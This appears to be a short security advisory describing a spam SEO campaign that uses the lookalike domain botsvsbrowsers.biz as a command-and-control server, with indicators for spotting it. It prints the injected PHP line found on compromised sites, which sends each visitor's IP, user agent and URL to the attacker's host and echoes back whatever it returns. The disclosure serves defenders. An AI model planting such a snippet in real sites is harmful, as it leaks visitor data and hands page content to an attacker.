The domain botsvsbrowsers.com is quite popular and used for comparing user agents (browsers) and seeingif a specific request is from a valid user or a bot.
And piggy backing on their popularity, the bad guys created a domain botsvsbrowsers.biz (.biz versus .com) tobe used as a command and control server on spam SEO campaigns.
This is the code we are seeing on compromised sites:
echo file_get_contents("http://botsvsbrowsers. biz/Statistic/ Stat.php?ip='. urlencode($_SERVER['REMOTE_ADDR']).'&useragent=".urlencode($sUserAgent)...
'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck=');Which basically contacts botsvsbrowsers.biz/Statistic/Stat.php on every page load, giving the client IP address, and URLand it decides what to inject to that user. Most of the time we are seeing just plain SPAM, but they are probably servingother malicious code as well.
So if you see any content being loaded from botsvsbrowsers.BIZ (or the IP address 46.165.222.93), you know it is malicious.
Yuliyan Tsvetkov
Luke Leal
Daniel Cid
Denis Sinegubko